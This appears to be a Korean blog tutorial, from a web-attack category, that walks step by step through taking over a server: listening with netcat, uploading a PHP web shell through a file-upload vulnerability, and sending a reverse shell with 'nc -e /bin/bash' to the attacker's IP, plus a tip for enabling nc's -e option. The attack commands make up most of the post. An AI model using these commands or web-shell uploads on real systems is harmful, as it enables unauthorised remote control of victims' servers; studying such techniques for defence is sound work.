1. 공격자 서버 포트 리스닝
nc -l -p [포트번호]

공격자 서버에서 netcat 도구를 활용해 1024번 포트를 리스닝으로 열어 놓는다.
2. 웹 쉘 업로드

파일 업로드 취약점이 있는 개인 홈페이지에
php로 작성된 웹 쉘을 업로드했다.
3. 리버스 쉘 작성
nc -e /bin/bash [공격자 서버 IP] [포트번호]
더보기
-e 옵션이 사용되지 않을 때
# apt-get install netcat-traditional
# update-alternatives --config nc
ㄴ> 2번 옵션 선택
https://aceatom.tistory.com/346
nc -e 옵션 사용이 안될때
nc를 통해 리버스쉘을 연결하려고 하는데 사진처럼 -e 옵션이 유효하지 않다고 할 때 해결법이다. 검색을 해보니 이 상황은 -e 옵션이 비활성화되어 설치됐기 때문에 Attacker에 리버스연결을 할 수
aceatom.tistory.com

업로드된 웹 쉘에
피해자 서버의 쉘을 공격자의 서버로 전달하는 netcat 명령어를 입력했다.
4. 피해자 서버 장악

공격자 서버에서
피해자 서버의 쉘을 이용할 수 있게 된 모습을 볼 수 있다.
'Web App > Attack' 카테고리의 다른 글
| DOM 객체 접근(with JavaScript) (0) | 2024.06.29 |
|---|---|
| Useful JavaScript (0) | 2024.06.29 |
| XSS Sheet (0) | 2024.06.29 |
| KeyLogger 만들기(with JavaScript) (1) | 2024.05.14 |
| 쿠키 탈취(with JavaScript) (0) | 2024.05.13 |